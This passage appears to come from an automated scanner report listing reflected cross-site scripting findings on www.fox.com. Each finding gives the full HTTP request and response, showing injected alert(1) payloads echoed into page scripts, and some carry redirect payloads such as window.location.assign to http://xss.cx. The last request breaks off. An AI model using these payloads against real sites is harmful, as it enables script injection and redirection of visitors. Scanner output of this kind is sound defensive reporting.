GET /_ui86dee"-alert(1)-"d9f655f316f/fox_player66704%22-alert(1)-%2219baaf36eac/videoXml.php HTTP/1.1
Host: www.fox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/_ui/fox_player66704%22-alert(1)-%2219baaf36eac/videoXml.php
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|274475EC851D313D-4000014500050F53[CE]; volumeCookie=75; s_pers=%20s_vnum%3D1320123600936%2526vn%253D1%7C1320123600936%3B%20s_v18_stack%3D%255B%255B'D%25253Dc18'%252C'1317596476851'%255D%255D%7C1475449276850%3B%20s_invisit%3Dtrue%7C1317598323586%3B%20s_dayslastvisit%3D1317596523589%7C1412204523589%3B%20s_dayslastvisit_s%3DFirst%2520Visit%7C1317598323589%3B; s_sess=%20s_ppv%3D82%3B%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20c_m%3Dundefinedburpburp%3B%20s_sq%3D%3B

Response

HTTP/1.1 404 Not Found
Server: Apache
X-FarmName: www.fox.com
X-FarmAddr: 10.96.57.107
Content-Type: text/html; charset=utf-8
Content-Length: 22354
Cache-Control: max-age=3600
Date: Sun, 02 Oct 2011 23:11:30 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
       <title>FOX Broadcastin
...[SNIP]...
<![CDATA[
s_analytics.pageName="fox:shows:_ui86dee"-alert(1)-"d9f655f316f:fox_player66704%22-alert(1)-%2219baaf36eacvideoxml"
s_analytics.hier1="fox:shows:_ui86dee"-alert(1)-"d9f655f316f:fox_player66704%22-alert(1)-%2219baaf36eacvideoxml" //Site Content Hierarchy
s_anal
...[SNIP]...

2.216. http://www.fox.com/_ui/fox_player66704%22-alert(1)-%2219baaf36eac/videoXml.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fox.com
Path:   /_ui/fox_player66704%22-alert(1)-%2219baaf36eac/videoXml.php

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 86547"-alert(1)-"958c411b368 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /_ui/fox_player66704%22-alert(1)-%2219baaf36eac86547"-alert(1)-"958c411b368/videoXml.php HTTP/1.1
Host: www.fox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/_ui/fox_player66704%22-alert(1)-%2219baaf36eac/videoXml.php
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|274475EC851D313D-4000014500050F53[CE]; volumeCookie=75; s_pers=%20s_vnum%3D1320123600936%2526vn%253D1%7C1320123600936%3B%20s_v18_stack%3D%255B%255B'D%25253Dc18'%252C'1317596476851'%255D%255D%7C1475449276850%3B%20s_invisit%3Dtrue%7C1317598323586%3B%20s_dayslastvisit%3D1317596523589%7C1412204523589%3B%20s_dayslastvisit_s%3DFirst%2520Visit%7C1317598323589%3B; s_sess=%20s_ppv%3D82%3B%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20c_m%3Dundefinedburpburp%3B%20s_sq%3D%3B

Response

HTTP/1.1 404 Not Found
Server: Apache
X-FarmName: www.fox.com
X-FarmAddr: 10.96.57.110
Content-Type: text/html; charset=utf-8
Content-Length: 22326
Cache-Control: max-age=3600
Date: Sun, 02 Oct 2011 23:11:32 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
       <title>FOX Broadcastin
...[SNIP]...
<![CDATA[
s_analytics.pageName="fox:shows:_ui:fox_player66704%22-alert(1)-%2219baaf36eac86547"-alert(1)-"958c411b368videoxml"
s_analytics.hier1="fox:shows:_ui:fox_player66704%22-alert(1)-%2219baaf36eac86547"-alert(1)-"958c411b368videoxml" //Site Content Hierarchy
s_analytics.hier3="entertainment:fox:shows:_ui:fo
...[SNIP]...

2.217. http://www.fox.com/_ui/fox_player66704%22-alert(1)-%2219baaf36eac/videoXml.php [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fox.com
Path:   /_ui/fox_player66704%22-alert(1)-%2219baaf36eac/videoXml.php

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bea0a"-alert(1)-"35014117d04 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /_ui/fox_player66704%22-alert(1)-%2219baaf36eac/videoXml.phpbea0a"-alert(1)-"35014117d04 HTTP/1.1
Host: www.fox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/_ui/fox_player66704%22-alert(1)-%2219baaf36eac/videoXml.php
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|274475EC851D313D-4000014500050F53[CE]; volumeCookie=75; s_pers=%20s_vnum%3D1320123600936%2526vn%253D1%7C1320123600936%3B%20s_v18_stack%3D%255B%255B'D%25253Dc18'%252C'1317596476851'%255D%255D%7C1475449276850%3B%20s_invisit%3Dtrue%7C1317598323586%3B%20s_dayslastvisit%3D1317596523589%7C1412204523589%3B%20s_dayslastvisit_s%3DFirst%2520Visit%7C1317598323589%3B; s_sess=%20s_ppv%3D82%3B%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20c_m%3Dundefinedburpburp%3B%20s_sq%3D%3B

Response

HTTP/1.1 404 Not Found
Server: Apache
X-FarmName: www.fox.com
X-FarmAddr: 10.96.57.108
Content-Type: text/html; charset=utf-8
Content-Length: 22214
Cache-Control: max-age=3600
Date: Sun, 02 Oct 2011 23:11:35 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
       <title>FOX Broadcastin
...[SNIP]...
Sub - Section
s_analytics.prop8="fox:shows:_ui:fox_player66704%22-alert(1)-%2219baaf36ea" //Site Sub-Section 2
s_analytics.prop9="fox:shows:_ui:fox_player66704%22-alert(1)-%2219baaf36eacvideoxml.phpbea0a"-alert(1)-"35014117d04"
s_analytics.prop15="sub section:videoxml" //Content Type
s_analytics.prop17="" //Campaign
s_analytics.prop35="" //Content Title
s_analytics.prop36=""
s_analytics.prop42 = (s_analytics.getQ
...[SNIP]...

2.218. http://www.fox.com/_ui/fox_player66704%22-alert(1)-%2219baaf36eac/videoXml.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fox.com
Path:   /_ui/fox_player66704%22-alert(1)-%2219baaf36eac/videoXml.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eb0d4"-alert(1)-"3a1020ca558 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /_ui/fox_player66704%22-alert(1)-%2219baaf36eac/videoXml.php/eb0d4"-alert(1)-"3a1020ca558 HTTP/1.1
Host: www.fox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/_ui/fox_player66704%22-alert(1)-%2219baaf36eac/videoXml.php
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|274475EC851D313D-4000014500050F53[CE]; volumeCookie=75; s_pers=%20s_vnum%3D1320123600936%2526vn%253D1%7C1320123600936%3B%20s_v18_stack%3D%255B%255B'D%25253Dc18'%252C'1317596476851'%255D%255D%7C1475449276850%3B%20s_invisit%3Dtrue%7C1317598323586%3B%20s_dayslastvisit%3D1317596523589%7C1412204523589%3B%20s_dayslastvisit_s%3DFirst%2520Visit%7C1317598323589%3B; s_sess=%20s_ppv%3D82%3B%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20c_m%3Dundefinedburpburp%3B%20s_sq%3D%3B

Response

HTTP/1.1 404 Not Found
Server: Apache
X-FarmName: www.fox.com
X-FarmAddr: 10.96.57.111
Content-Type: text/html; charset=utf-8
Content-Length: 22266
Cache-Control: max-age=3600
Date: Sun, 02 Oct 2011 23:11:28 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
       <title>FOX Broadcastin
...[SNIP]...
<![CDATA[
s_analytics.pageName="fox:shows:_ui:fox_player66704%22-alert(1)-%2219baaf36eaceb0d4"-alert(1)-"3a1020ca558"
s_analytics.hier1="fox:shows:_ui:fox_player66704%22-alert(1)-%2219baaf36eaceb0d4"-alert(1)-"3a1020ca558" //Site Content Hierarchy
s_analytics.hier3="entertainment:fox:shows:_ui:fox_player66704%22
...[SNIP]...

2.219. http://www.fox.com/_ui/fox_player66704%22-window.location.assign(%22http://xss.cx%22)-%2219baaf36eac/videoXml.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fox.com
Path:   /_ui/fox_player66704%22-window.location.assign(%22http://xss.cx%22)-%2219baaf36eac/videoXml.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 17bbd"-alert(1)-"8da2983ce23 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /_ui17bbd"-alert(1)-"8da2983ce23/fox_player66704%22-window.location.assign(%22http://xss.cx%22)-%2219baaf36eac/videoXml.php HTTP/1.1
Host: www.fox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|274475EC851D313D-4000014500050F53[CE]; volumeCookie=75; s_pers=%20s_vnum%3D1320123600936%2526vn%253D1%7C1320123600936%3B%20s_v18_stack%3D%255B%255B'D%25253Dc18'%252C'1317596476851'%255D%255D%7C1475449276850%3B%20s_invisit%3Dtrue%7C1317598759005%3B%20s_dayslastvisit%3D1317596959007%7C1412204959007%3B%20s_dayslastvisit_s%3DFirst%2520Visit%7C1317598759007%3B; s_sess=%20s_ppv%3D82%3B%20c_m%3Dundefinedburpburp%3B%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B

Response

HTTP/1.1 404 Not Found
Server: Apache
X-FarmName: www.fox.com
X-FarmAddr: 10.96.57.115
Content-Type: text/html; charset=utf-8
Content-Length: 22377
Cache-Control: max-age=3600
Date: Sun, 02 Oct 2011 23:14:18 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
       <title>FOX Broadcastin
...[SNIP]...
<![CDATA[
s_analytics.pageName="fox:shows:_ui17bbd"-alert(1)-"8da2983ce23:fox_player66704%22-window.location.assign(%22httpvideoxml"
s_analytics.hier1="fox:shows:_ui17bbd"-alert(1)-"8da2983ce23:fox_player66704%22-window.location.assign(%22httpvideoxml" //Site Content Hie
...[SNIP]...

2.220. http://www.fox.com/_ui/fox_player66704%22-window.location.assign(%22http://xss.cx%22)-%2219baaf36eac/videoXml.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fox.com
Path:   /_ui/fox_player66704%22-window.location.assign(%22http://xss.cx%22)-%2219baaf36eac/videoXml.php

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d07de"-alert(1)-"295a0b9dd3b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /_ui/fox_player66704%22-window.location.assign(%22http:d07de"-alert(1)-"295a0b9dd3b//xss.cx%22)-%2219baaf36eac/videoXml.php HTTP/1.1
Host: www.fox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|274475EC851D313D-4000014500050F53[CE]; volumeCookie=75; s_pers=%20s_vnum%3D1320123600936%2526vn%253D1%7C1320123600936%3B%20s_v18_stack%3D%255B%255B'D%25253Dc18'%252C'1317596476851'%255D%255D%7C1475449276850%3B%20s_invisit%3Dtrue%7C1317598759005%3B%20s_dayslastvisit%3D1317596959007%7C1412204959007%3B%20s_dayslastvisit_s%3DFirst%2520Visit%7C1317598759007%3B; s_sess=%20s_ppv%3D82%3B%20c_m%3Dundefinedburpburp%3B%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B

Response

HTTP/1.1 404 Not Found
Server: Apache
X-FarmName: www.fox.com
X-FarmAddr: 10.96.57.114
Content-Type: text/html; charset=utf-8
Content-Length: 22237
Cache-Control: max-age=3600
Date: Sun, 02 Oct 2011 23:14:20 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
       <title>FOX Broadcastin
...[SNIP]...
b - Section
s_analytics.prop8="fox:shows:_ui:fox_player66704%22-window.location.assign(%22htt" //Site Sub-Section 2
s_analytics.prop9="fox:shows:_ui:fox_player66704%22-window.location.assign(%22httpd07de"-alert(1)-"295a0b9dd3b"
s_analytics.prop15="sub section:videoxml" //Content Type
s_analytics.prop17="" //Campaign
s_analytics.prop35="" //Content Title
s_analytics.prop36=""
s_analytics.prop42 = (s_analytics.getQ
...[SNIP]...

2.221. http://www.fox.com/_ui/fox_player66704%22-window.location.assign(%22http://xss.cx%22)-%2219baaf36eac/videoXml.php [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fox.com
Path:   /_ui/fox_player66704%22-window.location.assign(%22http://xss.cx%22)-%2219baaf36eac/videoXml.php

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 43757"-alert(1)-"46ed0a637af was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /_ui/fox_player66704%22-window.location.assign(%22http://xss.cx%22)-%2219baaf36eac/43757"-alert(1)-"46ed0a637af HTTP/1.1
Host: www.fox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|274475EC851D313D-4000014500050F53[CE]; volumeCookie=75; s_pers=%20s_vnum%3D1320123600936%2526vn%253D1%7C1320123600936%3B%20s_v18_stack%3D%255B%255B'D%25253Dc18'%252C'1317596476851'%255D%255D%7C1475449276850%3B%20s_invisit%3Dtrue%7C1317598759005%3B%20s_dayslastvisit%3D1317596959007%7C1412204959007%3B%20s_dayslastvisit_s%3DFirst%2520Visit%7C1317598759007%3B; s_sess=%20s_ppv%3D82%3B%20c_m%3Dundefinedburpburp%3B%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B

Response

HTTP/1.1 404 Not Found
Server: Apache
X-FarmName: www.fox.com
X-FarmAddr: 10.96.57.105
Content-Type: text/html; charset=utf-8
Content-Length: 22289
Cache-Control: max-age=3600
Date: Sun, 02 Oct 2011 23:14:22 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
       <title>FOX Broadcastin
...[SNIP]...
<![CDATA[
s_analytics.pageName="fox:shows:_ui:fox_player66704%22-window.location.assign(%22http43757"-alert(1)-"46ed0a637af"
s_analytics.hier1="fox:shows:_ui:fox_player66704%22-window.location.assign(%22http43757"-alert(1)-"46ed0a637af" //Site Content Hierarchy
s_analytics.hier3="entertainment:fox:shows:_ui:fox_player6
...[SNIP]...

2.222. http://www.fox.com/_ui/fox_player66704%22-window.location.assign(%22http://xss.cx%22)-%2219baaf36eac/videoXml.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fox.com
Path:   /_ui/fox_player66704%22-window.location.assign(%22http://xss.cx%22)-%2219baaf36eac/videoXml.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 48283"-alert(1)-"becba50b315 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /_ui/fox_player66704%22-window.location.assign(%22http://xss.cx%22)-%2219baaf36eac/videoXml.php/48283"-alert(1)-"becba50b315 HTTP/1.1
Host: www.fox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|274475EC851D313D-4000014500050F53[CE]; volumeCookie=75; s_pers=%20s_vnum%3D1320123600936%2526vn%253D1%7C1320123600936%3B%20s_v18_stack%3D%255B%255B'D%25253Dc18'%252C'1317596476851'%255D%255D%7C1475449276850%3B%20s_invisit%3Dtrue%7C1317598759005%3B%20s_dayslastvisit%3D1317596959007%7C1412204959007%3B%20s_dayslastvisit_s%3DFirst%2520Visit%7C1317598759007%3B; s_sess=%20s_ppv%3D82%3B%20c_m%3Dundefinedburpburp%3B%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B

Response

HTTP/1.1 404 Not Found
Server: Apache
X-FarmName: www.fox.com
X-FarmAddr: 10.96.57.110
Content-Type: text/html; charset=utf-8
Content-Length: 22289
Cache-Control: max-age=3600
Date: Sun, 02 Oct 2011 23:14:17 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
       <title>FOX Broadcastin
...[SNIP]...
<![CDATA[
s_analytics.pageName="fox:shows:_ui:fox_player66704%22-window.location.assign(%22http48283"-alert(1)-"becba50b315"
s_analytics.hier1="fox:shows:_ui:fox_player66704%22-window.location.assign(%22http48283"-alert(1)-"becba50b315" //Site Content Hierarchy
s_analytics.hier3="entertainment:fox:shows:_ui:fox_player6
...[SNIP]...

2.223. http://www.fox.com/_ui/fox_player66704%22-window.open(%22http://xss.cx/%22)-%2219baaf36eac/videoXml.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fox.com
Path:   /_ui/fox_player66704%22-window.open(%22http://xss.cx/%22)-%2219baaf36eac/videoXml.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 70321"-alert(1)-"cac5fde1d79 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /_ui70321"-alert(1)-"cac5fde1d79/fox_player66704%22-window.open(%22http://xss.cx/%22)-%2219baaf36eac/videoXml.php HTTP/1.1
Host: www.fox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|274475EC851D313D-4000014500050F53[CE]; volumeCookie=75; s_pers=%20s_vnum%3D1320123600936%2526vn%253D1%7C1320123600936%3B%20s_v18_stack%3D%255B%255B'D%25253Dc18'%252C'1317596476851'%255D%255D%7C1475449276850%3B%20s_invisit%3Dtrue%7C1317598444908%3B%20s_dayslastvisit%3D1317596644910%7C1412204644910%3B%20s_dayslastvisit_s%3DFirst%2520Visit%7C1317598444910%3B; s_sess=%20s_ppv%3D82%3B%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20c_m%3Dundefinedburpburp%3B%20s_sq%3D%3B

Response

HTTP/1.1 404 Not Found
Server: Apache
X-FarmName: www.fox.com
X-FarmAddr: 10.96.57.115
Content-Type: text/html; charset=utf-8
Content-Length: 22322
Cache-Control: max-age=3600
Date: Sun, 02 Oct 2011 23:13:41 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
       <title>FOX Broadcastin
...[SNIP]...
<![CDATA[
s_analytics.pageName="fox:shows:_ui70321"-alert(1)-"cac5fde1d79:fox_player66704%22-window.open(%22httpvideoxml"
s_analytics.hier1="fox:shows:_ui70321"-alert(1)-"cac5fde1d79:fox_player66704%22-window.open(%22httpvideoxml" //Site Content Hierarchy
s_analytics.hi
...[SNIP]...

2.224. http://www.fox.com/_ui/fox_player66704%22-window.open(%22http://xss.cx/%22)-%2219baaf36eac/videoXml.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fox.com
Path:   /_ui/fox_player66704%22-window.open(%22http://xss.cx/%22)-%2219baaf36eac/videoXml.php

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6f56e"-alert(1)-"83cf35fb6ad was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /_ui/fox_player66704%22-window.open(%22http:6f56e"-alert(1)-"83cf35fb6ad//xss.cx/%22)-%2219baaf36eac/videoXml.php HTTP/1.1
Host: www.fox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|274475EC851D313D-4000014500050F53[CE]; volumeCookie=75; s_pers=%20s_vnum%3D1320123600936%2526vn%253D1%7C1320123600936%3B%20s_v18_stack%3D%255B%255B'D%25253Dc18'%252C'1317596476851'%255D%255D%7C1475449276850%3B%20s_invisit%3Dtrue%7C1317598444908%3B%20s_dayslastvisit%3D1317596644910%7C1412204644910%3B%20s_dayslastvisit_s%3DFirst%2520Visit%7C1317598444910%3B; s_sess=%20s_ppv%3D82%3B%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20c_m%3Dundefinedburpburp%3B%20s_sq%3D%3B

Response

HTTP/1.1 404 Not Found
Server: Apache
X-FarmName: www.fox.com
X-FarmAddr: 10.96.57.111
Content-Type: text/html; charset=utf-8
Content-Length: 22182
Cache-Control: max-age=3600
Date: Sun, 02 Oct 2011 23:13:42 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
       <title>FOX Broadcastin
...[SNIP]...
:shows:_ui" //Site Sub - Section
s_analytics.prop8="fox:shows:_ui:fox_player66704%22-window.open(%22htt" //Site Sub-Section 2
s_analytics.prop9="fox:shows:_ui:fox_player66704%22-window.open(%22http6f56e"-alert(1)-"83cf35fb6ad"
s_analytics.prop15="sub section:videoxml" //Content Type
s_analytics.prop17="" //Campaign
s_analytics.prop35="" //Content Title
s_analytics.prop36=""
s_analytics.prop42 = (s_analytics.getQ
...[SNIP]...

2.225. http://www.fox.com/_ui/fox_player66704%22-window.open(%22http://xss.cx/%22)-%2219baaf36eac/videoXml.php [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fox.com
Path:   /_ui/fox_player66704%22-window.open(%22http://xss.cx/%22)-%2219baaf36eac/videoXml.php

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fb967"-alert(1)-"6467b81c6be was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /_ui/fox_player66704%22-window.open(%22http://xss.cx/%22)-%2219baaf36eac/fb967"-alert(1)-"6467b81c6be HTTP/1.1
Host: www.fox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
